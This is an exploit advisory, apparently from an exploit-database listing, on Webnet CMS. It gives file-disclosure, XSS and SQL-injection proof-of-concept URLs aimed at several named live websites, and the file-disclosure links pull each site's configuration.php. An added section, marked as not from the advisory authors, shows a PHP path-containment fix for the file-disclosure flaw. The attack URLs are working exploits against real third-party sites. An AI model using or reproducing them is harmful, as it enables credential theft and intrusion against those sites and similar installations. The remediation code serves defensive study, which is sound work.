######################
# Exploit Title : Webnet CMS Multiple Vulnerabilities
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.webnet.ir/
# Homepage : http://www.persian-team.ir
# Date: 2016/04/15
# Version : 1.2
######################
# POC:
#
# 1-LFD (Local File Disclosure)
# Explanation :
# The ids parameter of download.php holds a base64-encoded file path; decode it with base64_decode("parameter value") to see the path
# For Example :
# <?php print(base64_decode("L2hvbWUvZ3BwYXJzL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZ3VyYXRpb24ucGhw")) ?>
# Result : /home/gppars/public_html/includes/configuration.php
# Demo :
#
# http://www.rayaniroo.ir/download.php?ids=L2hvbWUvcmF5YW5pcm9vL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZ3VyYXRpb24ucGhw&filename=configuration.php
# http://www.gp-pars.ir/download.php?filename=configuration.php&ids=L2hvbWUvZ3BwYXJzL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZ3VyYXRpb24ucGhw
# http://www.greenrefahtea.com/download.php?filename=configuration.php&ids=L2hvbWUvZ3JlZW5yZWYvcHVibGljX2h0bWwvaW5jbHVkZXMvY29uZmlndXJhdGlvbi5waHA=
# http://iran-tea.ir/download.php?filename=configuration.php&ids=L2hvbWUvZ3JlZW5yZWYvcHVibGljX2h0bWwvaW5jbHVkZXMvY29uZmlndXJhdGlvbi5waHA=
# http://www.eastshop.ir/download.php?filename=configuration.php&ids=L2hvbWUvZWFzdHNob3AvcHVibGljX2h0bWwvaW5jbHVkZXMvY29uZmlndXJhdGlvbi5waHA=
#
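# One way to close item 1 on the server side, as an added example (not Webnet CMS code and not from the advisory authors): decode ids, canonicalise the path, and refuse anything that resolves outside a single download directory.
# The function name resolve_download, the $baseDir layout and the blocked-extension list are assumptions; the sample files are constructed in a temporary directory.

```php
<?php
declare(strict_types=1);
// Added example, not Webnet CMS code. Assumptions: downloadable files live under
// one directory ($baseDir, hypothetical) and "ids" is a base64-encoded path.
/** Return the canonical path to serve, or null when the request is refused. */
function resolve_download(string $ids, string $baseDir): ?string
{
    // Strict mode returns false on characters outside the base64 alphabet.
    $decoded = base64_decode($ids, true);
    if ($decoded === false || $decoded === '' || strpos($decoded, "\0") !== false) {
        return null;
    }
    // Canonicalise both sides so "..", symlinks and absolute paths are resolved
    // before comparing; realpath() returns false when the file does not exist.
    $base = realpath($baseDir);
    $path = realpath($decoded[0] === '/' ? $decoded : $baseDir . '/' . $decoded);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    // Containment: the trailing separator stops "/downloads_old" matching "/downloads".
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    // Never stream server-side source or configuration, even from inside the base.
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    if (in_array($ext, ['php', 'phtml', 'inc', 'ini', 'env'], true)) {
        return null;
    }
    return $path;
}

// Constructed layout for the demonstration (temporary directory, not a real site).
$root = sys_get_temp_dir() . '/webnet_demo_' . getmypid();
mkdir("$root/downloads", 0700, true);
mkdir("$root/includes", 0700, true);
file_put_contents("$root/downloads/catalog.pdf", 'sample');
file_put_contents("$root/includes/configuration.php", '<?php // constructed');

$cases = [
    'file inside downloads' => "$root/downloads/catalog.pdf",
    'config, absolute path' => "$root/includes/configuration.php",
    'config, traversal'     => '../includes/configuration.php',
];
foreach ($cases as $label => $p) {
    $ok = resolve_download(base64_encode($p), "$root/downloads");
    printf("%-22s %s\n", $label, $ok === null ? 'REFUSED' : 'served');
}
// Remove the constructed files and directories again.
array_map('unlink', glob("$root/*/*"));
array_map('rmdir', ["$root/downloads", "$root/includes", $root]);
```

# A stronger design drops the client-supplied path entirely and has download.php look up an opaque identifier in a server-side table of files.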
# 2-XSS
# http://www.gp-pars.ir/?option=com_tour&view=cat&Itmid=-2%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&id=21&title=%D8%AA%D9%88%D8%B1%20%D9%82%D8%B4%D9%85
# http://iran-tea.ir/?option=com_store&view=product&Itmid=-2%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
#
# 3-SQL Injection
# http://iran-tea.ir/?option=com_store&view=product&Itmid=-2%27
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Greetz : FireKernel And Milad_Hacking
######################